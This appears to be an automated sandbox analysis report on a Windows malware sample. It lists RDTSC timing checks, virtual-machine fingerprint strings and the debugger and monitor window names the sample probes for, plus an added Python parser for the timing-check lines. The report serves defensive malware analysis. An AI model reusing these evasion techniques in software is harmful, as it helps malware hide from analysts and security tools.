                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536EFC second address: 536F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F25EC6CB8E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007F25EC6CB8E8h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53792A second address: 537930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537930 second address: 537936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537936 second address: 53793F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53793F second address: 537974 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25EC6CB8F4h 0x00000007 jmp 00007F25EC6CB8EAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jno 00007F25EC6CB8ECh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537974 second address: 537978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537978 second address: 53799D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25EC6CB8EBh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F25EC6CB8F4h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53799D second address: 5379A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5379A4 second address: 5379AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5379AA second address: 5379B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F25ED41A9EEh 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C2F4 second address: 53C2F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C2F8 second address: 53C2FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C2FC second address: 53C308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F25EC6CB8E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C308 second address: 53C30E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C30E second address: 53C314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C314 second address: 53C318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53DF05 second address: 53DF23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25EC6CB8F8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5593EB second address: 5593F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 558F2B second address: 558F2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 558F2F second address: 558F35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5590AA second address: 5590B8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F25EC6CB8E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5590B8 second address: 5590D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25ED41A9F9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5590D5 second address: 559118 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jl 00007F25EC6CB8E6h 0x0000000d pop esi 0x0000000e push edi 0x0000000f jmp 00007F25EC6CB8EFh 0x00000014 pop edi 0x00000015 popad 0x00000016 pushad 0x00000017 jc 00007F25EC6CB8FCh 0x0000001d jmp 00007F25EC6CB8F6h 0x00000022 push eax 0x00000023 push edx 0x00000024 push edi 0x00000025 pop edi 0x00000026 push eax 0x00000027 pop eax 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568863 second address: 568867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568867 second address: 56886B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56886B second address: 568871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568AFB second address: 568AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568AFF second address: 568B0F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F25ED41A9E6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568B0F second address: 568B13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 568B13 second address: 568B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5694B3 second address: 5694BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5694BC second address: 5694C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C123 second address: 56C127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C127 second address: 56C12D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C288 second address: 56C2A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25EC6CB8EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007F25EC6CB8E6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C2A5 second address: 56C2A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C341 second address: 56C3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 nop 0x00000006 movsx edx, di 0x00000009 push 00000004h 0x0000000b add edx, 0BFABC00h 0x00000011 call 00007F25EC6CB8E9h 0x00000016 jmp 00007F25EC6CB8F4h 0x0000001b push eax 0x0000001c pushad 0x0000001d jmp 00007F25EC6CB8F0h 0x00000022 jnl 00007F25EC6CB8E8h 0x00000028 popad 0x00000029 mov eax, dword ptr [esp+04h] 0x0000002d jmp 00007F25EC6CB8F7h 0x00000032 mov eax, dword ptr [eax] 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push ebx 0x00000039 pop ebx 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C3AD second address: 56C3B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C3B1 second address: 56C3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C3B7 second address: 56C3BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C3BD second address: 56C3D2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F25EC6CB8E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C3D2 second address: 56C3D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C5D9 second address: 56C5DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D848 second address: 56D84D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56D84D second address: 56D859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F25EC6CB8E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 570EA1 second address: 570EB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F25ED41A9E6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 570EB2 second address: 570EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD02DC second address: 4BD02E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD02E0 second address: 4BD02E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD02E6 second address: 4BD0303 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F25ED41A9F9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD0388 second address: 4BD0410 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25EC6CB8F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d push ecx 0x0000000e pushfd 0x0000000f jmp 00007F25EC6CB8F3h 0x00000014 jmp 00007F25EC6CB8F3h 0x00000019 popfd 0x0000001a pop eax 0x0000001b movsx edi, si 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 movzx ecx, di 0x00000025 pushfd 0x00000026 jmp 00007F25EC6CB8F3h 0x0000002b sub eax, 6D8EF4CEh 0x00000031 jmp 00007F25EC6CB8F9h 0x00000036 popfd 0x00000037 popad 0x00000038 pop ebp 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c mov bh, cl 0x0000003e rdtsc
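Each interceptor line above records two back-to-back rdtsc reads and the instructions executed between them. That is the shape of an RDTSC timing check (the "Tries to detect virtualization through RDTSC time measurements" signature in the overview): the protector reads the counter, runs a stretch of stack-neutral filler and jumps, reads it again, and treats an inflated delta as a sign that rdtsc is being trapped by a hypervisor or the code is being single-stepped. Because the listing follows the executed path, the address gap between the two reads exceeds the last listed offset whenever a jump was taken; the difference is bytes the protector jumped over. The following is an added Python example, written for this page rather than taken from Joe Sandbox or the sample: it parses these lines (four of them copied verbatim as constructed input), recovers that structure, and separates filler from the few pairs that wrap real register and memory work. The junk-versus-work split of mnemonics is this example's own heuristic, not a report signature.

```python
"""Parse the 'RDTSC instruction interceptor' findings into structured records.

Added example for this report, not Joe Sandbox code. The sample lines are copied
verbatim from the findings; the junk-versus-work split of mnemonics is this
example's own heuristic (an assumption), not a Joe Sandbox signature.
"""
import re
from dataclasses import dataclass, field

# Constructed input: four interceptor lines copied from the report.
RDTSC_LINES = [
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 519261 second address: 519267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc",
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51CF50 second address: 51CF5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F25ED41A9E6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc",
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537C72 second address: 537CC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25EC6CB8F4h 0x00000007 jmp 00007F25EC6CB8F1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F25EC6CB8F7h 0x00000015 jmp 00007F25EC6CB8EDh 0x0000001a rdtsc",
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56C341 second address: 56C3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 nop 0x00000006 movsx edx, di 0x00000009 push 00000004h 0x0000000b add edx, 0BFABC00h 0x00000011 call 00007F25EC6CB8E9h 0x00000016 jmp 00007F25EC6CB8F4h 0x0000001b push eax 0x0000001c pushad 0x0000001d jmp 00007F25EC6CB8F0h 0x00000022 jnl 00007F25EC6CB8E8h 0x00000028 popad 0x00000029 mov eax, dword ptr [esp+04h] 0x0000002d jmp 00007F25EC6CB8F7h 0x00000032 mov eax, dword ptr [eax] 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push ebx 0x00000039 pop ebx 0x0000003a rdtsc",
]

_HEADER = re.compile(
    r"RDTSC instruction interceptor: First address: ([0-9A-Fa-f]+) "
    r"second address: ([0-9A-Fa-f]+) instructions: (.*)$"
)
# Every listed instruction is introduced by an 8-digit 0x offset. Operands in this
# report never carry a 0x prefix (they look like 00007F25EC6CB8F4h), so the offset
# marker is unambiguous and can be used to split the listing.
_INSN = re.compile(r"0x([0-9A-Fa-f]{8})\s+(.+?)(?=\s+0x[0-9A-Fa-f]{8}\s|\s*$)")

# Stack-neutral filler and branches: what a protector can place between two rdtsc
# reads without disturbing program state (heuristic list, this example's own).
JUNK_MNEMONICS = {"push", "pop", "pushad", "popad", "pushfd", "popfd", "nop"}


def mnemonic(text: str) -> str:
    return text.split()[0].lower()


def is_junk(text: str) -> bool:
    m = mnemonic(text)
    return m in JUNK_MNEMONICS or m.startswith("j")  # jmp and every jcc


@dataclass
class RdtscPair:
    first: int                                   # address of the opening rdtsc
    second: int                                  # address of the closing rdtsc
    insns: list = field(default_factory=list)    # [(offset, text)] along the executed path

    @property
    def delta(self) -> int:        # address distance between the two reads
        return self.second - self.first

    @property
    def path_length(self) -> int:  # bytes actually executed: offset of the closing rdtsc
        return self.insns[-1][0]

    @property
    def skipped(self) -> int:      # bytes between the reads that taken jumps/calls flew over
        return self.delta - self.path_length

    @property
    def junk(self) -> list:
        return [t for _, t in self.insns[1:-1] if is_junk(t)]

    @property
    def work(self) -> list:        # anything that changes registers or memory
        return [t for _, t in self.insns[1:-1] if not is_junk(t)]


def parse_line(line: str):
    """Return an RdtscPair for an interceptor line, or None for any other finding."""
    m = _HEADER.search(line)
    if not m:
        return None
    insns = [(int(off, 16), text.strip()) for off, text in _INSN.findall(m.group(3))]
    if len(insns) < 2 or mnemonic(insns[0][1]) != "rdtsc" or mnemonic(insns[-1][1]) != "rdtsc":
        return None  # not a well-formed pair of reads
    return RdtscPair(int(m.group(1), 16), int(m.group(2), 16), insns)


def parse_report(lines) -> list:
    return [p for p in map(parse_line, lines) if p is not None]


def summarize(pairs) -> dict:
    """Aggregate view: how many pairs are pure filler versus wrapping real code."""
    return {
        "pairs": len(pairs),
        "pure_filler": sum(1 for p in pairs if not p.work),
        "with_work": sum(1 for p in pairs if p.work),
        "bytes_skipped": sum(p.skipped for p in pairs),
    }


if __name__ == "__main__":
    pairs = parse_report(RDTSC_LINES)
    for p in pairs:
        print(f"{p.first:08X}->{p.second:08X} delta={p.delta:3d} executed={p.path_length:3d} "
              f"skipped={p.skipped:3d} junk={len(p.junk):2d} work={p.work}")
    print(summarize(pairs))
```

Run against the whole block of interceptor lines, the summary shows that almost every pair brackets nothing but push/pop pairs, pushad/popad and jumps; the handful with `work` entries (the 56C341 and 4BD0388 pairs) are where the protector interleaves its timing reads with the program's own register and stack traffic, which is what makes the reads hard to patch out.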
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 2E1B12 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 4AF71C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 49A412 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 50CCFF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_000938B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00094910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00094910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0008DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0008DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0008E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0008E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0008ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0008ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00094570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00094570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0008DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0008DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0008BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0008BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00093EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00093EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0008F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0008F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000816D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00081160 GetSystemInfo,ExitProcess,0_2_00081160
                Source: file.exe, file.exe, 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2191696889.0000000000D38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2191696889.0000000000D95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2191696889.0000000000D64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2191696889.0000000000D38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware}0P
                Source: file.exe, 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13539
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13542
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13594
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13554
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13562
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort (reported three times)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000845C0 VirtualProtect ?,00000004,00000100,000000000_2_000845C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00099860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00099860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00099750 mov eax, dword ptr fs:[00000030h]0_2_00099750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00097850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00097850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6492, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00099600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00099600
                Source: file.exe, file.exe, 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00097B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00096920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00096920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00097850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00097850
